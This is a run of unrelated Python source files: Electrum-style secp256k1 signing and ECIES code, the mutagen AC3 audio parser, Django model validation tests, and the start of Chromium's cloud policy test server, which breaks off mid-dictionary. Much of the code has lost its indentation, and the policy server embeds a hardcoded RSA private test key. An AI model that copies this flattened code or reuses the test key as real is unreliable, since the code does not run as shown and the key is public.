def from_sig_string(cls, sig_string: bytes, recid: int, msg_hash: bytes):
assert_bytes(sig_string)
if len(sig_string) != 64:
raise Exception('Wrong encoding')
if recid < 0 or recid > 3:
raise ValueError('recid is {}, but should be 0 <= recid <= 3'.format(recid))
ecdsa_verifying_key = _MyVerifyingKey.from_signature(sig_string, recid, msg_hash, curve=SECP256k1)
ecdsa_point = ecdsa_verifying_key.pubkey.point
return ECPubkey.from_point(ecdsa_point)
@classmethod
def from_signature65(cls, sig: bytes, msg_hash: bytes):
if len(sig) != 65:
raise Exception("Wrong encoding")
nV = sig[0]
if nV < 27 or nV >= 35:
raise Exception("Bad encoding")
if nV >= 31:
compressed = True
nV -= 4
else:
compressed = False
recid = nV - 27
return cls.from_sig_string(sig[1:], recid, msg_hash), compressed
@classmethod
def from_point(cls, point):
_bytes = point_to_ser(point, compressed=False) # faster than compressed
return ECPubkey(_bytes)
def get_public_key_bytes(self, compressed=True):
if self.is_at_infinity(): raise Exception('point is at infinity')
return point_to_ser(self.point(), compressed)
def get_public_key_hex(self, compressed=True):
return bh2u(self.get_public_key_bytes(compressed))
    def point(self) -> Tuple[int, int]:
return self._pubkey.point.x(), self._pubkey.point.y()
def __mul__(self, other: int):
if not isinstance(other, int):
raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other)))
ecdsa_point = self._pubkey.point * other
return self.from_point(ecdsa_point)
def __rmul__(self, other: int):
return self * other
def __add__(self, other):
if not isinstance(other, ECPubkey):
raise TypeError('addition not defined for ECPubkey and {}'.format(type(other)))
ecdsa_point = self._pubkey.point + other._pubkey.point
return self.from_point(ecdsa_point)
def __eq__(self, other):
return self._pubkey.point.x() == other._pubkey.point.x() \
and self._pubkey.point.y() == other._pubkey.point.y()
def __ne__(self, other):
return not (self == other)
def verify_message_for_address(self, sig65: bytes, message: bytes) -> None:
assert_bytes(message)
h = Hash(msg_magic(message))
public_key, compressed = self.from_signature65(sig65, h)
# check public key
if public_key != self:
raise Exception("Bad signature")
# check message
self.verify_message_hash(sig65[1:], h)
def verify_message_hash(self, sig_string: bytes, msg_hash: bytes) -> None:
assert_bytes(sig_string)
if len(sig_string) != 64:
raise Exception('Wrong encoding')
ecdsa_point = self._pubkey.point
verifying_key = _MyVerifyingKey.from_public_point(ecdsa_point, curve=SECP256k1)
verifying_key.verify_digest(sig_string, msg_hash, sigdecode=ecdsa.util.sigdecode_string)
def encrypt_message(self, message: bytes, magic: bytes = b'BIE1'):
"""
ECIES encryption/decryption methods; AES-128-CBC with PKCS7 is used as the cipher; hmac-sha256 is used as the mac
"""
assert_bytes(message)
randint = ecdsa.util.randrange(CURVE_ORDER)
ephemeral_exponent = number_to_string(randint, CURVE_ORDER)
ephemeral = ECPrivkey(ephemeral_exponent)
ecdh_key = (self * ephemeral.secret_scalar).get_public_key_bytes(compressed=True)
key = hashlib.sha512(ecdh_key).digest()
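        # split SHA512(ECDH point) into IV (16 bytes), AES-128 key (16 bytes)
        # and HMAC-SHA256 key (32 bytes)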
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
ciphertext = aes_encrypt_with_iv(key_e, iv, message)
ephemeral_pubkey = ephemeral.get_public_key_bytes(compressed=True)
encrypted = magic + ephemeral_pubkey + ciphertext
mac = hmac_oneshot(key_m, encrypted, hashlib.sha256)
return base64.b64encode(encrypted + mac)
@classmethod
def order(cls):
return CURVE_ORDER
def is_at_infinity(self):
return self == point_at_infinity()
def msg_magic(message: bytes) -> bytes:
from .bitcoin import var_int
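    # 0x18 == 24, the varint length of the fixed prefix
    # "Bitcoin Signed Message:\n"; the message itself is also varint-prefixed.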
length = bfh(var_int(len(message)))
return b"\x18Bitcoin Signed Message:\n" + length + message
def verify_message_with_address(address: str, sig65: bytes, message: bytes):
from .bitcoin import pubkey_to_address
assert_bytes(sig65, message)
try:
h = Hash(msg_magic(message))
public_key, compressed = ECPubkey.from_signature65(sig65, h)
# check public key using the address
pubkey_hex = public_key.get_public_key_hex(compressed)
for txin_type in ['p2pkh','p2wpkh','p2wpkh-p2sh']:
addr = pubkey_to_address(txin_type, pubkey_hex)
if address == addr:
break
else:
raise Exception("Bad signature")
# check message
public_key.verify_message_hash(sig65[1:], h)
return True
except Exception as e:
print_error("Verification error: {0}".format(e))
return False
def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool:
if isinstance(secret, bytes):
secret = string_to_number(secret)
return 0 < secret < CURVE_ORDER
class ECPrivkey(ECPubkey):
def __init__(self, privkey_bytes: bytes):
assert_bytes(privkey_bytes)
if len(privkey_bytes) != 32:
raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes)))
secret = string_to_number(privkey_bytes)
if not is_secret_within_curve_range(secret):
raise InvalidECPointException('Invalid secret scalar (not within curve order)')
self.secret_scalar = secret
point = generator_secp256k1 * secret
super().__init__(point_to_ser(point))
self._privkey = ecdsa.ecdsa.Private_key(self._pubkey, secret)
@classmethod
def from_secret_scalar(cls, secret_scalar: int):
secret_bytes = number_to_string(secret_scalar, CURVE_ORDER)
return ECPrivkey(secret_bytes)
@classmethod
def from_arbitrary_size_secret(cls, privkey_bytes: bytes):
"""This method is only for legacy reasons. Do not introduce new code that uses it.
Unlike the default constructor, this method does not require len(privkey_bytes) == 32,
and the secret does not need to be within the curve order either.
"""
return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes))
@classmethod
def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes:
scalar = string_to_number(privkey_bytes) % CURVE_ORDER
if scalar == 0:
raise Exception('invalid EC private key scalar: zero')
privkey_32bytes = number_to_string(scalar, CURVE_ORDER)
return privkey_32bytes
def sign(self, data: bytes, sigencode=None, sigdecode=None) -> bytes:
if sigencode is None:
sigencode = sig_string_from_r_and_s
if sigdecode is None:
sigdecode = get_r_and_s_from_sig_string
private_key = _MySigningKey.from_secret_exponent(self.secret_scalar, curve=SECP256k1)
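        # sign_digest_deterministic derives the nonce per RFC 6979 from the
        # key and the digest, so no external entropy is needed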
sig = private_key.sign_digest_deterministic(data, hashfunc=hashlib.sha256, sigencode=sigencode)
public_key = private_key.get_verifying_key()
if not public_key.verify_digest(sig, data, sigdecode=sigdecode):
raise Exception('Sanity check verifying our own signature failed.')
return sig
def sign_transaction(self, hashed_preimage: bytes) -> bytes:
return self.sign(hashed_preimage,
sigencode=der_sig_from_r_and_s,
sigdecode=get_r_and_s_from_der_sig)
def sign_message(self, message: bytes, is_compressed: bool) -> bytes:
def bruteforce_recid(sig_string):
for recid in range(4):
sig65 = construct_sig65(sig_string, recid, is_compressed)
try:
self.verify_message_for_address(sig65, message)
return sig65, recid
                except Exception:
                    continue
            else:
                raise Exception("error: cannot sign message; no recid fits")
message = to_bytes(message, 'utf8')
msg_hash = Hash(msg_magic(message))
sig_string = self.sign(msg_hash,
sigencode=sig_string_from_r_and_s,
sigdecode=get_r_and_s_from_sig_string)
sig65, recid = bruteforce_recid(sig_string)
return sig65
def decrypt_message(self, encrypted, magic=b'BIE1'):
encrypted = base64.b64decode(encrypted)
if len(encrypted) < 85:
raise Exception('invalid ciphertext: length')
magic_found = encrypted[:4]
ephemeral_pubkey_bytes = encrypted[4:37]
ciphertext = encrypted[37:-32]
mac = encrypted[-32:]
if magic_found != magic:
raise Exception('invalid ciphertext: invalid magic bytes')
        try:
            ecdsa_point = _ser_to_python_ecdsa_point(ephemeral_pubkey_bytes)
        except InvalidECPointException as e:
            raise Exception('invalid ciphertext: invalid ephemeral pubkey') from e
if not ecdsa.ecdsa.point_is_valid(generator_secp256k1, ecdsa_point.x(), ecdsa_point.y()):
raise Exception('invalid ciphertext: invalid ephemeral pubkey')
ephemeral_pubkey = ECPubkey.from_point(ecdsa_point)
ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
raise InvalidPassword()
return aes_decrypt_with_iv(key_e, iv, ciphertext)
def construct_sig65(sig_string, recid, is_compressed):
comp = 4 if is_compressed else 0
return bytes([27 + recid + comp]) + sig_string
|
|
# -*- coding: utf-8 -*-
# Copyright (C) 2019 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""Pure AC3 file information.
"""
__all__ = ["AC3", "Open"]
from mutagen import StreamInfo
from mutagen._file import FileType
from mutagen._util import (
BitReader,
BitReaderError,
MutagenError,
convert_error,
enum,
loadfile,
endswith,
)
@enum
class ChannelMode(object):
DUALMONO = 0
MONO = 1
STEREO = 2
C3F = 3
C2F1R = 4
C3F1R = 5
C2F2R = 6
C3F2R = 7
AC3_CHANNELS = {
ChannelMode.DUALMONO: 2,
ChannelMode.MONO: 1,
ChannelMode.STEREO: 2,
ChannelMode.C3F: 3,
ChannelMode.C2F1R: 3,
ChannelMode.C3F1R: 4,
ChannelMode.C2F2R: 4,
ChannelMode.C3F2R: 5
}
AC3_HEADER_SIZE = 7
AC3_SAMPLE_RATES = [48000, 44100, 32000]
AC3_BITRATES = [
32, 40, 48, 56, 64, 80, 96, 112, 128,
160, 192, 224, 256, 320, 384, 448, 512, 576, 640
]
@enum
class EAC3FrameType(object):
INDEPENDENT = 0
DEPENDENT = 1
AC3_CONVERT = 2
RESERVED = 3
EAC3_BLOCKS = [1, 2, 3, 6]
class AC3Error(MutagenError):
pass
class AC3Info(StreamInfo):
"""AC3 stream information.
The length of the stream is just a guess and might not be correct.
Attributes:
channels (`int`): number of audio channels
length (`float`): file length in seconds, as a float
sample_rate (`int`): audio sampling rate in Hz
bitrate (`int`): audio bitrate, in bits per second
codec (`str`): ac-3 or ec-3 (Enhanced AC-3)
"""
channels = 0
length = 0
sample_rate = 0
bitrate = 0
codec = 'ac-3'
@convert_error(IOError, AC3Error)
def __init__(self, fileobj):
"""Raises AC3Error"""
header = bytearray(fileobj.read(6))
if len(header) < 6:
raise AC3Error("not enough data")
if not header.startswith(b"\x0b\x77"):
raise AC3Error("not a AC3 file")
bitstream_id = header[5] >> 3
if bitstream_id > 16:
raise AC3Error("invalid bitstream_id %i" % bitstream_id)
fileobj.seek(2)
self._read_header(fileobj, bitstream_id)
def _read_header(self, fileobj, bitstream_id):
bitreader = BitReader(fileobj)
try:
# This is partially based on code from
# https://github.com/FFmpeg/FFmpeg/blob/master/libavcodec/ac3_parser.c
if bitstream_id <= 10: # Normal AC-3
self._read_header_normal(bitreader, bitstream_id)
else: # Enhanced AC-3
self._read_header_enhanced(bitreader)
except BitReaderError as e:
raise AC3Error(e)
self.length = self._guess_length(fileobj)
def _read_header_normal(self, bitreader, bitstream_id):
r = bitreader
r.skip(16) # 16 bit CRC
sr_code = r.bits(2)
if sr_code == 3:
raise AC3Error("invalid sample rate code %i" % sr_code)
frame_size_code = r.bits(6)
if frame_size_code > 37:
raise AC3Error("invalid frame size code %i" % frame_size_code)
r.skip(5) # bitstream ID, already read
r.skip(3) # bitstream mode, not needed
channel_mode = ChannelMode(r.bits(3))
r.skip(2) # dolby surround mode or surround mix level
lfe_on = r.bits(1)
sr_shift = max(bitstream_id, 8) - 8
try:
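            # The low bit of frame_size_code only distinguishes the two
            # possible 44.1 kHz frame sizes per bitrate, so >> 1 yields the
            # index into the bitrate table.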
self.sample_rate = AC3_SAMPLE_RATES[sr_code] >> sr_shift
self.bitrate = (AC3_BITRATES[frame_size_code >> 1] * 1000
) >> sr_shift
        except IndexError as e:
raise AC3Error(e)
self.channels = self._get_channels(channel_mode, lfe_on)
self._skip_unused_header_bits_normal(r, channel_mode)
def _read_header_enhanced(self, bitreader):
r = bitreader
self.codec = "ec-3"
frame_type = r.bits(2)
if frame_type == EAC3FrameType.RESERVED:
raise AC3Error("invalid frame type %i" % frame_type)
r.skip(3) # substream ID, not needed
frame_size = (r.bits(11) + 1) << 1
if frame_size < AC3_HEADER_SIZE:
raise AC3Error("invalid frame size %i" % frame_size)
sr_code = r.bits(2)
try:
if sr_code == 3:
sr_code2 = r.bits(2)
if sr_code2 == 3:
raise AC3Error("invalid sample rate code %i" % sr_code2)
numblocks_code = 3
self.sample_rate = AC3_SAMPLE_RATES[sr_code2] // 2
else:
numblocks_code = r.bits(2)
self.sample_rate = AC3_SAMPLE_RATES[sr_code]
channel_mode = ChannelMode(r.bits(3))
lfe_on = r.bits(1)
self.bitrate = 8 * frame_size * self.sample_rate // (
EAC3_BLOCKS[numblocks_code] * 256)
        except IndexError as e:
raise AC3Error(e)
r.skip(5) # bitstream ID, already read
self.channels = self._get_channels(channel_mode, lfe_on)
self._skip_unused_header_bits_enhanced(
r, frame_type, channel_mode, sr_code, numblocks_code)
@staticmethod
def _skip_unused_header_bits_normal(bitreader, channel_mode):
r = bitreader
r.skip(5) # Dialogue Normalization
if r.bits(1): # Compression Gain Word Exists
r.skip(8) # Compression Gain Word
if r.bits(1): # Language Code Exists
r.skip(8) # Language Code
if r.bits(1): # Audio Production Information Exists
# Mixing Level, 5 Bits
# Room Type, 2 Bits
r.skip(7)
if channel_mode == ChannelMode.DUALMONO:
r.skip(5) # Dialogue Normalization, ch2
if r.bits(1): # Compression Gain Word Exists, ch2
r.skip(8) # Compression Gain Word, ch2
if r.bits(1): # Language Code Exists, ch2
r.skip(8) # Language Code, ch2
if r.bits(1): # Audio Production Information Exists, ch2
# Mixing Level, ch2, 5 Bits
# Room Type, ch2, 2 Bits
r.skip(7)
# Copyright Bit, 1 Bit
# Original Bit Stream, 1 Bit
r.skip(2)
        timecod1e = r.bits(1) # Time Code First Half Exists
        timecod2e = r.bits(1) # Time Code Second Half Exists
if timecod1e:
r.skip(14) # Time Code First Half
if timecod2e:
r.skip(14) # Time Code Second Half
if r.bits(1): # Additional Bit Stream Information Exists
            addbsil = r.bits(6) # Additional Bit Stream Information Length
r.skip((addbsil + 1) * 8)
@staticmethod
def _skip_unused_header_bits_enhanced(bitreader, frame_type, channel_mode,
sr_code, numblocks_code):
r = bitreader
r.skip(5) # Dialogue Normalization
if r.bits(1): # Compression Gain Word Exists
r.skip(8) # Compression Gain Word
if channel_mode == ChannelMode.DUALMONO:
r.skip(5) # Dialogue Normalization, ch2
if r.bits(1): # Compression Gain Word Exists, ch2
r.skip(8) # Compression Gain Word, ch2
if frame_type == EAC3FrameType.DEPENDENT:
if r.bits(1): # chanmap exists
r.skip(16) # chanmap
if r.bits(1): # mixmdate, 1 Bit
# FIXME: Handle channel dependent fields
return
if r.bits(1): # Informational Metadata Exists
# bsmod, 3 Bits
# Copyright Bit, 1 Bit
# Original Bit Stream, 1 Bit
r.skip(5)
if channel_mode == ChannelMode.STEREO:
                # dsurmod, 2 Bits
# dheadphonmod, 2 Bits
r.skip(4)
elif channel_mode >= ChannelMode.C2F2R:
r.skip(2) # dsurexmod
if r.bits(1): # Audio Production Information Exists
# Mixing Level, 5 Bits
# Room Type, 2 Bits
# adconvtyp, 1 Bit
r.skip(8)
if channel_mode == ChannelMode.DUALMONO:
if r.bits(1): # Audio Production Information Exists, ch2
# Mixing Level, ch2, 5 Bits
# Room Type, ch2, 2 Bits
# adconvtyp, ch2, 1 Bit
r.skip(8)
if sr_code < 3: # if not half sample rate
r.skip(1) # sourcefscod
if frame_type == EAC3FrameType.INDEPENDENT and numblocks_code == 3:
r.skip(1) # convsync
if frame_type == EAC3FrameType.AC3_CONVERT:
if numblocks_code != 3:
if r.bits(1): # blkid
r.skip(6) # frmsizecod
if r.bits(1): # Additional Bit Stream Information Exists
            addbsil = r.bits(6) # Additional Bit Stream Information Length
r.skip((addbsil + 1) * 8)
@staticmethod
def _get_channels(channel_mode, lfe_on):
try:
return AC3_CHANNELS[channel_mode] + lfe_on
except KeyError as e:
raise AC3Error(e)
def _guess_length(self, fileobj):
# use bitrate + data size to guess length
        if self.bitrate == 0:
            return 0.0
start = fileobj.tell()
fileobj.seek(0, 2)
length = fileobj.tell() - start
return 8.0 * length / self.bitrate
def pprint(self):
return u"%s, %d Hz, %.2f seconds, %d channel(s), %d bps" % (
self.codec, self.sample_rate, self.length, self.channels,
self.bitrate)
class AC3(FileType):
"""AC3(filething)
Arguments:
filething (filething)
Load AC3 or EAC3 files.
Tagging is not supported.
Use the ID3/APEv2 classes directly instead.
Attributes:
info (`AC3Info`)
"""
_mimes = ["audio/ac3"]
@loadfile()
def load(self, filething):
self.info = AC3Info(filething.fileobj)
def add_tags(self):
raise AC3Error("doesn't support tags")
@staticmethod
def score(filename, fileobj, header):
return header.startswith(b"\x0b\x77") * 2 \
+ (endswith(filename, ".ac3") or endswith(filename, ".eac3"))
Open = AC3
error = AC3Error
|
|
from django.test import TransactionTestCase
from django.core.exceptions import ValidationError
from django.core.management import call_command
from .. import models
class ServiceTests(TransactionTestCase):
def setUp(self):
call_command('registerplugins')
self.http = models.Plugin.objects.get(name='http')
self.smb = models.Plugin.objects.get(name='smb')
def test_malformed_service(self):
"""Should not be able to create services with malformed data"""
# Too little data
with self.assertRaises(ValidationError):
models.Service.objects.create()
with self.assertRaises(ValidationError):
models.Service.objects.create(name='Service1')
with self.assertRaises(ValidationError):
models.Service.objects.create(subnet_host=2)
with self.assertRaises(ValidationError):
models.Service.objects.create(port=80)
with self.assertRaises(ValidationError):
models.Service.objects.create(plugin=self.http)
with self.assertRaises(ValidationError):
models.Service.objects.create(name='Service1', subnet_host=1)
with self.assertRaises(ValidationError):
models.Service.objects.create(name='Service1', port=90)
with self.assertRaises(ValidationError):
models.Service.objects.create(name='Service1', plugin=self.http)
with self.assertRaises(ValidationError):
models.Service.objects.create(subnet_host=2, port=93)
with self.assertRaises(ValidationError):
models.Service.objects.create(subnet_host=2, plugin=self.smb)
with self.assertRaises(ValidationError):
models.Service.objects.create(port=2, plugin=self.smb)
with self.assertRaises(ValidationError):
models.Service.objects.create(
name='Service1', subnet_host=2, port=44)
with self.assertRaises(ValidationError):
models.Service.objects.create(
name='Service1', subnet_host=32, plugin=self.smb)
with self.assertRaises(ValidationError):
models.Service.objects.create(
name='Service1', port=32, plugin=self.smb)
with self.assertRaises(ValidationError):
models.Service.objects.create(
subnet_host=38, port=32, plugin=self.smb)
# Malformed arguments
## Name
with self.assertRaises(ValidationError): # Name is None
models.Service.objects.create(
name=None, subnet_host=1, port=93, plugin=self.http)
with self.assertRaises(ValidationError): # Name is empty
models.Service.objects.create(
name='', subnet_host=1, port=93, plugin=self.http)
with self.assertRaises(ValidationError): # Name is too long
models.Service.objects.create(
name='a'*21, subnet_host=1, port=93, plugin=self.http)
## Subnet_host
with self.assertRaises(ValidationError): # Subnet_host is None
models.Service.objects.create(
name='Service', subnet_host=None, port=93, plugin=self.http)
with self.assertRaises(ValidationError): # Subnet_host is not a number
models.Service.objects.create(
name='Service', subnet_host='hi', port=93, plugin=self.http)
with self.assertRaises(ValidationError): # Subnet_host is negative
models.Service.objects.create(
name='Service', subnet_host=-1, port=93, plugin=self.http)
        ## Port
with self.assertRaises(ValidationError): # Port is None
models.Service.objects.create(
name='Service', subnet_host=1, port=None, plugin=self.http)
with self.assertRaises(ValidationError): # Port is not a number
models.Service.objects.create(
name='Service', subnet_host=1, port='oh', plugin=self.http)
with self.assertRaises(ValidationError): # Port is negative
models.Service.objects.create(
name='Service', subnet_host=1, port=-1, plugin=self.http)
with self.assertRaises(ValidationError): # Port is outside port range
models.Service.objects.create(
name='Service', subnet_host=1, port=65536, plugin=self.http)
with self.assertRaises(ValidationError): # Port is outside port range
models.Service.objects.create(
name='Service', subnet_host=1, port=0, plugin=self.http)
        ## Plugin
with self.assertRaises(ValidationError): # Plugin is None
models.Service.objects.create(
name='Service', subnet_host=1, port=15, plugin=None)
with self.assertRaises(ValueError): # Plugin is not a model object
models.Service.objects.create(
name='Service', subnet_host=1, port=15, plugin='http')
def test_service_same_names(self):
"""Services with the same name are not allowed"""
models.Service.objects.create(
name='Service1', subnet_host=1, port=30, plugin=self.http)
with self.assertRaises(ValidationError):
models.Service.objects.create(
name='Service1', subnet_host=2, port=38, plugin=self.http)
def test_service_same_host_port(self):
"""Services with the same host/port combo are not allowed"""
models.Service.objects.create(
name='Service1', subnet_host=1, port=30, plugin=self.http)
with self.assertRaises(ValidationError):
models.Service.objects.create(
name='Service2', subnet_host=1, port=30, plugin=self.smb)
def test_service_correct(self):
"""Correctly created services should be allowed"""
self.assertEqual(models.Service.objects.count(), 0)
models.Service.objects.create(
name='Service1', subnet_host=1, port=80, plugin=self.http)
self.assertEqual(models.Service.objects.count(), 1)
models.Service.objects.create(
name='Service2', subnet_host=4, port=38, plugin=self.smb)
self.assertEqual(models.Service.objects.count(), 2)
models.Service.objects.create( # Same host different port
name='Service3', subnet_host=1, port=38, plugin=self.http)
self.assertEqual(models.Service.objects.count(), 3)
models.Service.objects.create( # Different host same port
name='Service4', subnet_host=2, port=80, plugin=self.http)
self.assertEqual(models.Service.objects.count(), 4)
def test_service_plugin_delete_cascade(self):
"""When a service's plugin is deleted, the service is also deleted"""
models.Service.objects.create(
name='Service', subnet_host=5, port=39, plugin=self.http)
self.assertEqual(models.Service.objects.count(), 1)
self.http.delete()
self.assertEqual(models.Service.objects.count(), 0)
def test_service_ip_calculation(self):
"""IPs should be properly calculated from subnet and netmask"""
s1 = models.Service.objects.create(
name='Service1', subnet_host=3, port=28, plugin=self.http)
s2 = models.Service.objects.create(
name='Service2', subnet_host=15, port=28, plugin=self.http)
ip1 = s1.ip('192.168.1.0', '255.255.255.0')
self.assertEqual(ip1, '192.168.1.3')
ip2 = s2.ip('192.168.1.0', '255.255.255.0')
self.assertEqual(ip2, '192.168.1.15')
ip3 = s1.ip('192.168.1.0', '255.255.255.128')
self.assertEqual(ip3, '192.168.1.3')
ip4 = s2.ip('192.168.1.128', '255.255.255.128')
self.assertEqual(ip4, '192.168.1.143')
def test_service_malformed_edit(self):
"""Services should raise an error when edited with malformed data"""
s = models.Service.objects.create(
name='Service', subnet_host=1, port=93, plugin=self.http)
with self.assertRaises(ValidationError): # Name is None
s.name = None
s.save()
with self.assertRaises(ValidationError): # Name is empty
s.name = ''
s.save()
with self.assertRaises(ValidationError): # Name is too long
s.name = 'a'*21
s.save()
## Subnet_host
with self.assertRaises(ValidationError): # Subnet_host is None
s.subnet_host = None
s.save()
with self.assertRaises(ValidationError): # Subnet_host is not a number
s.subnet_host = 'hi'
s.save()
with self.assertRaises(ValidationError): # Subnet_host is negative
s.subnet_host = -1
s.save()
        ## Port
with self.assertRaises(ValidationError): # Port is None
s.port = None
s.save()
with self.assertRaises(ValidationError): # Port is not a number
s.port = 'oh'
s.save()
with self.assertRaises(ValidationError): # Port is negative
s.port = -1
s.save()
with self.assertRaises(ValidationError): # Port is outside port range
s.port = 65536
s.save()
with self.assertRaises(ValidationError): # Port is outside port range
s.port = 0
s.save()
        ## Plugin
with self.assertRaises(ValidationError): # Plugin is None
s.plugin = None
s.save()
with self.assertRaises(ValueError): # Plugin is not a model object
s.plugin = 'http'
s.save()
def test_service_edit(self):
"""Service fields should be updated when properly edited"""
s = models.Service.objects.create(
name='Service', subnet_host=1, port=93, plugin=self.http)
s.name = 'kdkdkdkd'
s.save()
s = models.Service.objects.get(pk=s.pk)
self.assertEqual(s.name, 'kdkdkdkd')
s.subnet_host = 5
s.save()
s = models.Service.objects.get(pk=s.pk)
self.assertEqual(s.subnet_host, 5)
s.port = 5
s.save()
s = models.Service.objects.get(pk=s.pk)
self.assertEqual(s.port, 5)
s.plugin = self.smb
s.save()
s = models.Service.objects.get(pk=s.pk)
self.assertEqual(s.plugin, self.smb)
def test_service_edit_same_names(self):
"""Services with the same name are not allowed when editing"""
models.Service.objects.create(
name='Service1', subnet_host=1, port=30, plugin=self.http)
s = models.Service.objects.create(
name='Service2', subnet_host=2, port=38, plugin=self.http)
with self.assertRaises(ValidationError):
s.name = 'Service1'
s.save()
def test_service_edit_same_host_port(self):
"""Services with the same host/port combo are not allowed
when editing"""
models.Service.objects.create(
name='Service1', subnet_host=1, port=30, plugin=self.http)
s = models.Service.objects.create(
name='Service2', subnet_host=2, port=30, plugin=self.smb)
with self.assertRaises(ValidationError):
s.subnet_host = 1
s.save()
s = models.Service.objects.create(
name='Service3', subnet_host=1, port=50, plugin=self.smb)
with self.assertRaises(ValidationError):
s.port = 30
s.save()
|
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A bare-bones test server for testing cloud policy support.
This implements a simple cloud policy test server that can be used to test
Chrome's device management service client. The policy information is read from
the file named device_management in the server's data directory. It contains
enforced and recommended policies for the device and user scope, and a list
of managed users.
The format of the file is JSON. The root dictionary contains a list under the
key "managed_users". It contains auth tokens for which the server will claim
that the user is managed. The token string "*" indicates that all users are
claimed to be managed. Other keys in the root dictionary identify request
scopes. The user-request scope is described by a dictionary that holds two
sub-dictionaries: "mandatory" and "recommended". Both these hold the policy
definitions as key/value stores; their format is identical to what the Linux
implementation reads from /etc.
The device scope holds the policy definitions directly as key/value stores in
the protobuf format.
Example:
{
"google/chromeos/device" : {
"guest_mode_enabled" : false
},
"google/chromeos/user" : {
"mandatory" : {
"HomepageLocation" : "http://www.chromium.org",
"IncognitoEnabled" : false
},
"recommended" : {
"JavascriptEnabled": false
}
},
"google/chromeos/publicaccount/user@example.com" : {
"mandatory" : {
"HomepageLocation" : "http://www.chromium.org"
},
"recommended" : {
}
},
"managed_users" : [
"secret123456"
],
"current_key_index": 0,
"robot_api_auth_code": "",
"invalidation_source": 1025,
"invalidation_name": "UENUPOL"
}
"""
import base64
import BaseHTTPServer
import cgi
import glob
import google.protobuf.text_format
import hashlib
import json
import logging
import os
import random
import re
import sys
import time
import tlslite
import tlslite.api
import tlslite.utils
import tlslite.utils.cryptomath
import urllib
import urllib2
import urlparse
import asn1der
import testserver_base
import device_management_backend_pb2 as dm
import cloud_policy_pb2 as cp
# Policy for extensions is not supported on Android nor iOS.
try:
import chrome_extension_policy_pb2 as ep
except ImportError:
ep = None
# Device policy is only available on Chrome OS builds.
try:
import chrome_device_policy_pb2 as dp
except ImportError:
dp = None
# ASN.1 object identifier for PKCS#1/RSA.
PKCS1_RSA_OID = '\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01'
# List of bad machine identifiers that trigger the |valid_serial_number_missing|
# flag to be set in the policy fetch response.
BAD_MACHINE_IDS = [ '123490EN400015' ]
# List of machines that trigger the server to send kiosk enrollment response
# for the register request.
KIOSK_MACHINE_IDS = [ 'KIOSK' ]
# Dictionary containing base64-encoded policy signing keys plus per-domain
# signatures. Format is:
# {
# 'key': <base64-encoded PKCS8-format private key>,
# 'signatures': {
#     <domain1>: <base64-encoded SHA256 signature for key + domain1>
#     <domain2>: <base64-encoded SHA256 signature for key + domain2>
# ...
# }
# }
SIGNING_KEYS = [
# Key1
{'key':
'MIIBVQIBADANBgkqhkiG9w0BAQEFAASCAT8wggE7AgEAAkEA2c3KzcPqvnJ5HCk3OZkf1'
'LMO8Ht4dw4FO2U0EmKvpo0zznj4RwUdmKobH1AFWzwZP4CDY2M67MsukE/1Jnbx1QIDAQ'
'ABAkBkKcLZa/75hHVz4PR3tZaw34PATlfxEG6RiRIwXlf/FFlfGIZOSxdW/I1A3XRl0/9'
'nZMuctBSKBrcTRZQWfT/hAiEA9g8xbQbMO6BEH/XCRSsQbPlvj4c9wDtVEzeAzZ/ht9kC'
'IQDiml+/lXS1emqml711jJcYJNYJzdy1lL/ieKogR59oXQIhAK+Pl4xa1U2VxAWpq7r+R'
'vH55wdZT03hB4p2h4gvEzXBAiAkw9kvE0eZPiBZoRrrHIFTOH7FnnHlwBmV2+/2RsiVPQ'
'IhAKqx/4qisivvmoM/xbzUagfoxwsu1A/4mGjhBKiS0BCq',
'signatures':
{'example.com':
'l+sT5mziei/GbmiP7VtRCCfwpZcg7uKbW2OlnK5B/TTELutjEIAMdHduNBwbO44qOn'
'/5c7YrtkXbBehaaDYFPGI6bGTbDmG9KRxhS+DaB7opgfCQWLi79Gn/jytKLZhRN/VS'
'y+PEbezqMi3d1/xDxlThwWZDNwnhv9ER/Nu/32ZTjzgtqonSn2CQtwXCIILm4FdV/1'
'/BdmZG+Ge4i4FTqYtInir5YFe611KXU/AveGhQGBIAXo4qYg1IqbVrvKBSU9dlI6Sl'
'9TJJLbJ3LGaXuljgFhyMAl3gcy7ftC9MohEmwa+sc7y2mOAgYQ5SSmyAtQwQgAkX9J'
'3+tfxjmoA/dg==',
'chromepolicytest.com':
'TzBiigZKwBdr6lyP6tUDsw+Q9wYO1Yepyxm0O4JZ4RID32L27sWzC1/hwC51fRcCvP'
'luEVIW6mH+BFODXMrteUFWfbbG7jgV+Wg+QdzMqgJjxhNKFXPTsZ7/286LAd1vBY/A'
'nGd8Wog6AhzfrgMbLNsH794GD0xIUwRvXUWFNP8pClj5VPgQnJrIA9aZwW8FNGbteA'
'HacFB0T/oqP5s7XT4Qvkj14RLmCgTwEM8Vcpqy5teJaF8yN17wniveddoOQGH6s0HC'
'ocprEccrH5fP/WVAPxCfx4vVYQY5q4CZ4K3f6dTC2FV4IDelM6dugEkvSS02YCzDaO'
'N+Z7IwElzTKg==',
'managedchrome.com':
'T0wXC5w3GXyovA09pyOLX7ui/NI603UfbZXYyTbHI7xtzCIaHVPH35Nx4zdqVrdsej'
'ErQ12yVLDDIJokY4Yl+/fj/zrkAPxThI+TNQ+jo0i+al05PuopfpzvCzIXiZBbkbyW'
'3XfedxXP3IPN2XU2/3vX+ZXUNG6pxeETem64kGezkjkUraqnHw3JVzwJYHhpMcwdLP'
'PYK6V23BbEHEVBtQZd/ledXacz7gOzm1zGni4e+vxA2roAdJWyhbjU0dTKNNUsZmMv'
